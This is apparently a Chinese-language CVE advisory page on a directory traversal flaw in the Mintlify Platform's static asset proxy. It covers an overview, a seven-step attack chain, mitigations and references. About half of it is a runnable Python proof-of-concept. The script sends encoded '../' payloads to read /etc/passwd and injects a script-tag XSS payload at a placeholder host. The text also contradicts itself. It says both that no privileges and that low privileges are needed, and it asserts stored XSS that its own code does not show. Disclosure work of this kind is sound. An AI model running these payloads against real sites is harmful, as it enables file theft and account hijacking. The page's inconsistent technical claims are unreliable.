CVE-2025-67845 | Mintlify 静态资源代理端点目录遍历漏洞

漏洞信息

漏洞编号

CVE-2025-67845

漏洞类型

目录遍历

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Mintlify Platform

漏洞概述

CVE-2025-67845 是 Mintlify Platform 中发现的目录遍历漏洞。该漏洞存在于静态资源代理端点（Static Asset Proxy Endpoint），攻击者可以通过构造包含路径遍历序列（如 ../）的恶意 URL 来访问系统上的任意文件。攻击者利用此漏洞可以注入任意 Web 脚本或 HTML 代码，可能导致敏感信息泄露、持久型 XSS 攻击或其他安全风险。该漏洞影响 2025-11-15 之前的所有 Mintlify Platform 版本。由于攻击复杂度低且无需特殊权限即可利用，对使用受影响版本的用户构成中等程度的安全威胁。建议相关用户尽快升级到最新修复版本以消除安全风险。

技术细节

该漏洞属于经典的目录遍历（Path Traversal）安全问题，存在于 Mintlify Platform 的静态资源代理功能中。攻击者通过在 URL 路径中插入 '../' 等路径遍历序列，绕过安全限制访问 Web 根目录之外的文件系统资源。攻击者可利用此漏洞读取服务器配置文件、源代码、凭据文件等敏感信息。更严重的是，攻击者可以通过注入恶意 HTML 或 JavaScript 代码实现存储型 XSS 攻击，当其他用户访问被污染的页面时，攻击代码将在受害者浏览器中执行，从而窃取会话 Cookie、劫持用户账号或执行其他恶意操作。CVSS 3.1 向量 AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 表明该漏洞可通过网络远程利用，攻击复杂度低，需要低权限认证，无需用户交互即可实现攻击。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标网站使用的 Mintlify Platform 版本，确认是否在 2025-11-15 之前

STEP 2

步骤2

构造恶意 URL：攻击者构造包含路径遍历序列（如 ../ 或 URL 编码的 %2f）的特殊 URL

STEP 3

步骤3

发送请求：攻击者通过 HTTP GET 请求向静态资源代理端点发送构造的恶意 URL

STEP 4

步骤4

绕过安全限制：服务器未正确过滤路径遍历序列，攻击者成功访问 Web 根目录之外的文件

STEP 5

步骤5

敏感信息泄露：攻击者读取服务器配置文件、环境变量、源代码等敏感文件

STEP 6

步骤6

XSS 攻击：攻击者注入恶意 HTML/JavaScript 代码，实现持久型跨站脚本攻击

STEP 7

步骤7

账号劫持：利用窃取的会话 Cookie 或通过 XSS 蠕虫进一步控制用户账号

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-67845 PoC - Directory Traversal in Mintlify Static Asset Proxy
# Target: Mintlify Platform < 2025-11-15

def exploit_directory_traversal(target_url):
    """
    Exploit directory traversal vulnerability to read sensitive files
    """
    # Path traversal payload to read /etc/passwd
    traversal_payloads = [
        '/api/_static/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd',
        '/api/_static/..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd',
        '/_static/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd'
    ]
    
    for payload in traversal_payloads:
        try:
            url = target_url.rstrip('/') + payload
            response = requests.get(url, timeout=10)
            if response.status_code == 200 and 'root:' in response.text:
                print(f'[+] Success! File content:\n{response.text}')
                return response.text
        except requests.RequestException as e:
            print(f'[-] Request failed: {e}')
    
    return None

# XSS injection via path traversal
def exploit_xss_injection(target_url):
    """
    Inject malicious script via path traversal
    """
    xss_payload = '/api/_static/..%2f..%2f<script>alert("XSS-CVE-2025-67845")</script>'
    url = target_url.rstrip('/') + xss_payload
    
    try:
        response = requests.get(url, timeout=10)
        print(f'[+] XSS payload sent to {url}')
        return True
    except requests.RequestException as e:
        print(f'[-] Request failed: {e}')
        return False

if __name__ == '__main__':
    target = 'https://vulnerable-mintlify-site.com'
    print('[*] CVE-2025-67845 Exploitation Test')
    print('[*] Target:', target)
    exploit_directory_traversal(target)
    exploit_xss_injection(target)

影响范围

Mintlify Platform < 2025-11-15

防御指南

临时缓解措施

如无法立即升级，可采取以下临时缓解措施：1) 在反向代理层配置 URL 白名单过滤，阻止包含 ../ 或 %2f 等字符的请求；2) 限制静态资源代理端点的功能，仅允许访问预定义的资源路径；3) 启用 CSP（内容安全策略）响应头，限制脚本执行来源；4) 监控日志中的可疑路径遍历请求模式，及时发现攻击行为。在完成升级前，建议限制该端点对公网的暴露。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67845
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67845
3 Details https://www.cvedetails.com/cve/CVE-2025-67845/
4 VulDB https://vuldb.com/cve/CVE-2025-67845
5 Link https://heartbreak.ing/
6 Link https://kibty.town/blog/mintlify/
7 Link https://news.ycombinator.com/item?id=46317098
8 Link https://www.mintlify.com/blog/working-with-security-researchers-november-2025
9 Link https://www.mintlify.com/docs/changelog